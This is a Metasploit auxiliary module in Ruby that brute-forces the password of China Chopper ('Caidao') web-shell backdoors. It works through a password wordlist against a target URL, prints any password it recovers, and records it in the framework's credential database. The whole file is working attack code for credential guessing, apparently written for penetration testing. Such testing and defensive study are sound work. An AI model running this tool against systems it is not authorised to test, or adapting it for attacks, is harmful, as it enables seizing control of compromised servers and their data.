Path: blob/master/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/caidao'

# Auxiliary scanner module. For every host handed in by the Scanner mixin it
# asks the Caidao LoginScanner whether the target at TARGETURI looks usable
# (check_setup) and, if so, runs the password list against it, logging each
# outcome and recording it through the Report mixin.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  # Registers module metadata and options.
  #
  # @param info [Hash] metadata passed in by the framework, merged by update_info
  def initialize(info = {})
    reference_urls = %w[
      https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
      https://www.mandiant.com/resources/breaking-down-the-china-chopper-web-shell-part-ii
      https://www.exploit-db.com/docs/27654.pdf
      https://www.cisa.gov/uscert/ncas/alerts/TA15-314A
      http://blog.csdn.net/nixawk/article/details/40430329
    ]

    module_info = {
      'Name' => 'Chinese Caidao Backdoor Bruteforce',
      'Description' => 'This module attempts to bruteforce chinese caidao asp/php/aspx backdoor.',
      'Author' => [ 'Nixawk' ],
      'References' => reference_urls.map { |url| ['URL', url] },
      'License' => MSF_LICENSE
    }
    super(update_info(info, module_info))

    default_wordlist = File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URL that handles the login process', '/caidao.php']),
        OptPath.new('PASS_FILE', [false, 'The file that contains a list of of probable passwords.', default_wordlist])
      ]
    )

    # Caidao authenticates with a password alone, so every username-related
    # option inherited from AuthBrute/HttpClient is removed from the option list.
    username_options = %w[HttpUsername HttpPassword USERNAME USER_AS_PASS USERPASS_FILE USER_FILE DB_ALL_USERS]
    deregister_options(*username_options)
  end

  # Returns the LoginScanner for +ip+, building it on first use and caching it
  # in @scanner; later calls return the cached instance regardless of +ip+.
  #
  # @param ip [String] target address
  # @return [Metasploit::Framework::LoginScanner::Caidao]
  def scanner(ip)
    @scanner ||= begin
      # The LoginScanner API refuses to run without a username, so a fixed
      # placeholder is supplied. report_good_cred never writes it to the DB.
      creds = build_credential_collection(username: 'caidao', password: datastore['PASSWORD'])

      # HttpUsername/HttpPassword were deregistered in initialize; these reads
      # presumably yield nil unless the datastore still carries a value.
      scanner_config = configure_http_login_scanner(
        host: ip,
        port: datastore['RPORT'],
        uri: datastore['TARGETURI'],
        cred_details: creds,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 5, # seconds, fixed here rather than exposed as an option
        http_username: datastore['HttpUsername'],
        http_password: datastore['HttpPassword']
      )

      Metasploit::Framework::LoginScanner::Caidao.new(scanner_config)
    end
  end

  # Stores a working password in the database: a credential core holding only
  # the password (private data, no username) plus a login row that ties it to
  # the http/tcp service at ip:port in the current workspace.
  #
  # @param ip [String] target address
  # @param port [Integer] target port
  # @param result [Object] scanner result; responds to credential, status and proof
  # @return the value of create_credential_login
  def report_good_cred(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    core = create_credential(
      service_data.merge(
        module_fullname: fullname,
        origin_type: :service,
        private_data: result.credential.private,
        private_type: :password
      )
    )

    create_credential_login(
      service_data.merge(
        core: core,
        last_attempted_at: DateTime.now,
        status: result.status,
        proof: result.proof
      )
    )
  end

  # Marks a failed or unconnectable attempt in the database so the same
  # password is not recorded as valid for this service.
  #
  # @param ip [String] target address
  # @param rport [Integer] target port
  # @param result [Object] scanner result; responds to credential, status and proof
  # @return the value of invalidate_login
  def report_bad_cred(ip, rport, result)
    cred = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      private: cred.private,
      realm_key: cred.realm_key,
      realm_value: cred.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs the scanner against +ip+ and reports each attempt. Only the three
  # statuses listed below are handled; any other status is ignored.
  #
  # @param ip [String] target address
  def bruteforce(ip)
    login_status = Metasploit::Model::Login::Status

    scanner(ip).scan! do |result|
      password = result.credential.private

      if result.status == login_status::SUCCESSFUL
        # The recovered password is echoed to the console at :good level.
        print_brute(level: :good, ip: ip, msg: "Success: '#{password}'")
        report_good_cred(ip, rport, result)
      elsif result.status == login_status::UNABLE_TO_CONNECT
        # Connection problems are only shown in verbose mode; the proof carries the reason.
        vprint_brute(level: :verror, ip: ip, msg: result.proof)
        report_bad_cred(ip, rport, result)
      elsif result.status == login_status::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{password}'")
        report_bad_cred(ip, rport, result)
      end
    end
  end

  # Scanner mixin entry point, called once per host. The password run only
  # starts when the scanner's check_setup accepts the target; otherwise an
  # error line is printed and the host is skipped.
  #
  # @param ip [String] target address
  def run_host(ip)
    if scanner(ip).check_setup
      bruteforce(ip)
    else
      print_brute(level: :error, ip: ip, msg: 'Backdoor type is not support')
    end
  end
end